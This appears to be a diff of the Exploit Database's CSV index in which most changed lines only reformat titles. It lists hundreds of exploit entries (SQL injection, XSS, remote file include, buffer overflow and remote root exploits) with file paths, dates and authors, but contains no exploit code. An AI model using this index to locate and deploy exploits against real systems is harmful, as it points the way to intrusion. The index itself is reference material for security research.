-28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 +28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 - Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.PHP Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.PHP SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 @@ -26200,7 +26200,7 @@ id,file,description,date,author,platform,type,port 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 vf_info.asp StrMes Parameter XSS",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 vf_newtopic.asp IFRAME Element XSS",2006-12-04,St@rExT,asp,webapps,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability",2006-12-05,"Juan Pablo Lopez",windows,dos,0 -29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 WFICA.OCX ActiveX Component Heap Buffer Overflow Vulnerability",2006-12-06,"Andrew Christensen",windows,remote,0 +29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow Vulnerability",2006-12-06,"Andrew Christensen",windows,remote,0 29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0 29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 @@ -26870,7 +26870,7 @@ id,file,description,date,author,platform,type,port 29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes CSRF File Upload Vulnerability",2013-12-01,"Jje Incovers",php,webapps,0 29949,platforms/windows/dos/29949.c,"Multiple Vendors Zoo Compression Algorithm Remote Denial of Service Vulnerability",2007-05-04,Jean-Sébastien,windows,dos,0 29950,platforms/osx/local/29950.js,"Apple <= 2.0.4 Safari Unspecified Local Vulnerability",2007-05-04,poplix,osx,local,0 -29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0 +29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting Vulnerability",2007-05-04,Solarius,windows,remote,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability",2007-05-07,kezzap66345,php,webapps,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 /011.1 Path Arbitrary Code Execution Vulnerability",2007-05-07,"Arnaud Giersch",linux,local,0 @@ -26987,7 +26987,7 @@ id,file,description,date,author,platform,type,port 30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting Vulnerability",2007-05-23,"Marc Ruef",asp,webapps,0 -30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 Cross-Domain Browser Location Information Disclosure Vulnerability",2007-05-23,"Gareth Heyes",multiple,remote,0 +30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure Vulnerability",2007-05-23,"Gareth Heyes",multiple,remote,0 30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 Rating.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Janek Vind",php,webapps,0 30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service Vulnerability",2007-05-24,"Bart Oldeman",linux,dos,0 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 News.ASP Cross-Site Scripting Vulnerability",2007-05-24,vagrant,php,webapps,0 @@ -27246,7 +27246,7 @@ id,file,description,date,author,platform,type,port 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,metasploit,windows,remote,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption Vulnerability",2013-12-17,"Stefan Esser",php,dos,0 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 -30397,platforms/windows/dos/30397.txt,"Windows Kernel win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 +30397,platforms/windows/dos/30397.txt,"Windows Kernel Win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 Capture Command Local Stack Based Buffer Overflow Vulnerability",2007-07-26,qaaz,aix,local,0 30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client Local Buffer Overflow Vulnerability",2007-07-26,qaaz,aix,local,0 @@ -27279,7 +27279,7 @@ id,file,description,date,author,platform,type,port 30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Chrome-Loaded About:Blank Script Execution Vulnerability",2007-07-31,moz_bug_r_a4,linux,remote,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability",2007-07-31,d3hydr8,cgi,webapps,0 -30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 Buffer Overflow Vulnerability",2007-07-31,"Code Audit Labs",windows,remote,0 +30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow Vulnerability",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector Index.PHP Cross-Site Scripting Vulnerability",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 30444,platforms/linux/dos/30444.txt,"KDE Konqueror <= 3.5.7 Assert Denial of Service Vulnerability",2007-03-05,"Thomas Waldegger",linux,dos,0 @@ -27466,7 +27466,7 @@ id,file,description,date,author,platform,type,port 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 postComment.php Remote File Include Vulnerability",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 -30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 Cross-Site Request Forgery Vulnerability",2007-10-04,"David Kierznowski",php,webapps,0 +30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery Vulnerability",2007-10-04,"David Kierznowski",php,webapps,0 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 Verify.PHP Cross-Site Scripting Vulnerability",2007-10-04,"Jose Sanchez",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x GetImage Arbitrary File Download Vulnerability",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 @@ -27576,7 +27576,7 @@ id,file,description,date,author,platform,type,port 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0 30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0 -30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 +30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0 30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 @@ -27598,7 +27598,7 @@ id,file,description,date,author,platform,type,port 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 ParseRTSPRequestString Remote Denial Of Service Vulnerability",2007-11-19,"Luigi Auriemma",linux,dos,0 -30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0 +30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 - Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow Vulnerability",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 @@ -27651,8 +27651,8 @@ id,file,description,date,author,platform,type,port 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0 -30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0 -30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 +30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0 +30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 @@ -27800,7 +27800,7 @@ id,file,description,date,author,platform,type,port 30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 - 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 -30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 +30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 @@ -28712,7 +28712,7 @@ id,file,description,date,author,platform,type,port 31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 -31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 Cross-Site Scripting Vulnerability and Arbitrary File Upload Vulnerability",2008-06-20,"AmnPardaz ",php,webapps,0 +31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting Vulnerability and Arbitrary File Upload Vulnerability",2008-06-20,"AmnPardaz ",php,webapps,0 31944,platforms/php/webapps/31944.txt,"PHPAuction 'profile.php' SQL Injection Vulnerability",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 @@ -28862,7 +28862,7 @@ id,file,description,date,author,platform,type,port 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0 -32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0 +32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0 32104,platforms/multiple/dos/32104.txt,"ZDaemon 1.8 - NULL Pointer Remote Denial of Service Vulnerability",2008-07-21,"Luigi Auriemma",multiple,dos,0 32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 - (.m3u / .pls) Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 learnPath/calendar/myagenda.php Query String XSS",2008-07-22,DSecRG,php,webapps,0 @@ -29196,7 +29196,7 @@ id,file,description,date,author,platform,type,port 32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0 32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0 -32454,platforms/unix/dos/32454.xml,"libxml2 Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0 +32454,platforms/unix/dos/32454.xml,"libxml2 - Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0 32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Command Directory Traversal Vulnerability",2008-10-03,dmnt,windows,remote,0 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection Vulnerability",2008-10-03,"Jaykishan Nirmal",windows,remote,0 @@ -29313,7 +29313,7 @@ id,file,description,date,author,platform,type,port 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross-Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service Vulnerability",2008-11-09,killprog.org,windows,dos,0 -32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 Cross-Site Scripting and Information Disclosure Vulnerabilities",2008-11-09,"Xia Shing Zee",java,webapps,0 +32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting and Information Disclosure Vulnerabilities",2008-11-09,"Xia Shing Zee",java,webapps,0 32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0 32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 32577,platforms/asp/webapps/32577.txt,"Dizi Portali 'film.asp' SQL Injection Vulnerability",2008-11-10,"Kaan KAMIS",asp,webapps,0 @@ -29826,7 +29826,7 @@ id,file,description,date,author,platform,type,port 33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Include Vulnerability",2009-06-27,"Hadi Kiamarsi",php,webapps,0 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution quick_search.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution viewprofile.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 -33114,platforms/php/webapps/33114.txt,"Almond Classifieds Component for Joomla! 7.5 Cross-Site Scripting and SQL-Injection Vulnerabilities",2009-06-27,Moudi,php,webapps,0 +33114,platforms/php/webapps/33114.txt,"Almond Classifieds Component for Joomla! 7.5 - Cross-Site Scripting and SQL-Injection Vulnerabilities",2009-06-27,Moudi,php,webapps,0 33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products index.php replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0 33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products index.php Multiple Parameter XSS",2009-06-27,Moudi,php,webapps,0 33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro gmap.php addr Parameter XSS",2009-06-27,Moudi,php,webapps,0 @@ -30142,7 +30142,7 @@ id,file,description,date,author,platform,type,port 33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0 33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0 -33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 +33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 - 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 - 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 - 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 @@ -30512,10 +30512,10 @@ id,file,description,date,author,platform,type,port 33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0 -33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 -33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 -33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 -33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0 +33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 +33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0 +33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 +33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 Remote DoS",2007-10-02,mu-b,multiple,dos,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 33882,platforms/php/webapps/33882.txt,"Cyber CMS 'faq.php' SQL Injection Vulnerability",2009-11-26,hc0de,php,webapps,0 @@ -30834,7 +30834,7 @@ id,file,description,date,author,platform,type,port 34230,platforms/windows/remote/34230.txt,"Freewebscriptz Online Games Login Multiple SQL Injection Vulnerabilities",2009-12-31,"Hussin X",windows,remote,0 34231,platforms/php/webapps/34231.txt,"LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps,0 34232,platforms/php/webapps/34232.txt,"DPScms 'q' Parameter SQL Injection and Cross-Site Scripting Vulnerabilities",2010-07-01,Ariko-Security,php,webapps,0 -34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 Denial Of Service Vulnerability",2010-07-01,"Azim Poonawala",windows,dos,0 +34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial Of Service Vulnerability",2010-07-01,"Azim Poonawala",windows,dos,0 34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Parameter Cross-Site Scripting Vulnerability",2010-07-01,ITSecTeam,php,webapps,0 34235,platforms/php/webapps/34235.txt,"Wiki Web Help 0.2.7 - Cross-Site Scripting and HTML Injection Vulnerabilities",2010-07-01,"John Leitch",php,webapps,0 34236,platforms/php/webapps/34236.txt,"ReCMS 'users_lang' Parameter Directory Traversal Vulnerability",2010-07-01,Locu,php,webapps,0 @@ -30853,7 +30853,7 @@ id,file,description,date,author,platform,type,port 34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting Vulnerability",2010-07-06,"Andrea Bocchetti",php,webapps,0 34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0 -34255,platforms/php/webapps/34255.html,"cPanel 11.25 Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0 +34255,platforms/php/webapps/34255.html,"cPanel 11.25 - Cross-Site Request Forgery Vulnerability",2010-07-03,G0D-F4Th3r,php,webapps,0 34256,platforms/php/webapps/34256.py,"SocialABC NetworX 1.0.3 Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-07-05,"John Leitch",php,webapps,0 34257,platforms/php/webapps/34257.txt,"NTSOFT BBS E-Market Professional Multiple Cross-Site Scripting Vulnerabilities",2010-07-06,"Ivan Sanchez",php,webapps,0 34258,platforms/php/webapps/34258.txt,"NewsOffice 2.0.18 - 'news_show.php' Cross-Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0 @@ -31392,7 +31392,7 @@ id,file,description,date,author,platform,type,port 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 - (.bmp) Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 -34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80 +34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80 34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability",2014-10-02,"Krusty Hack",php,webapps,80 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0 @@ -31692,7 +31692,7 @@ id,file,description,date,author,platform,type,port 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash PoC",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash PoC",2014-11-06,metacom,windows,dos,0 